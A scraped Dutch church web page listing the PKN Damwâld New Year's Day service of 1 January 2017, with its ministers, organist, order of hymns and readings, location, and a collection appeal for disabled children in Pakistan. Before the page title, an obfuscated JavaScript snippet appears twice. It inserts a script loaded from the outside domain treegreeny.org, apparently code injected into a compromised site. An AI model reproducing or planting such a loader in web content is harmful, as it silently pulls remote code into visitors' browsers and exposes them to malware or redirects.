;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Nieuwjaarsdienst - PKN Damwâld
zondag 1 januari 2017
11:00 uur
Gezamenlijke dienst PKN Damwâld / Koffie na de dienst

Nieuwjaarsdienst

vg_-01

Informatie

Voorganger:S. Boukes en G. Timmer
Organist:Jaap van der Horn
Mededeling:Gezamenlijke dienst PKN Damwâld / Koffie na de dienst
Liturgie
Lied voor de dienst ELB 186a:1,2
Welkom en mededelingen
Intochtslied Ps.84:1,3,6
Stil gebed Aanvangswoorden en groet
We zingen: Gezang 1
Lezing van de Geloofsbelijdenis
We zingen: ELB 170
Gebed bij de opening van de Bijbel
We zingen: Gez.329:1,2
We lezen: Luk.10:1-16
We zingen: Gez.314:1,2
Verkondiging
We zingen: ELB 246
Gebeden, afgesloten met het samen bidden van het Onze Vader .
Collecte
We zingen: Gez.459:1,5,6,7,8
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Kinderen in de knel

Geef liefde aan kinderen met een handicap in Pakistan
Vandaag collecteren we voor verstandelijk beperkte kinderen in Pakistan. In de kleine, arme, plattelandsdorpen in Pakistan is bijna geen zorg voor kinderen met een handicap. De ouders weten niet goed hoe ze met hun gehandicapte kind om moeten gaan. Ze verbergen hun kinderen. Ze schamen zich. Sommigen zien de handicap zelfs als een straf van God. De christelijke organisatie NOAD helpt en steunt deze ouders en hun kinderen om hen een volwaardig plekje in het gezin en de samenleving te geven. Dat doen zij door kennis te delen met de ouders over de rechten van hun kind, de juiste medische zorg en ze laten zien hoe hun kinderen door liefde, zorg en aandacht zich beter ontwikkelen. Ze bloeien op, ze lachen weer. Met uw gift helpt u mee om Pakistaanse kinderen met een handicap een plekje in hun gezin en in de dorpsgemeenschap te geven. Door de broodnodige liefde, zorg en aandacht. Als kinderen van God, kinderen die gezien mogen worden. Geef liefde, geef uw gift.

Tweede collecte: Kerk
Uitganscollecte: Kerk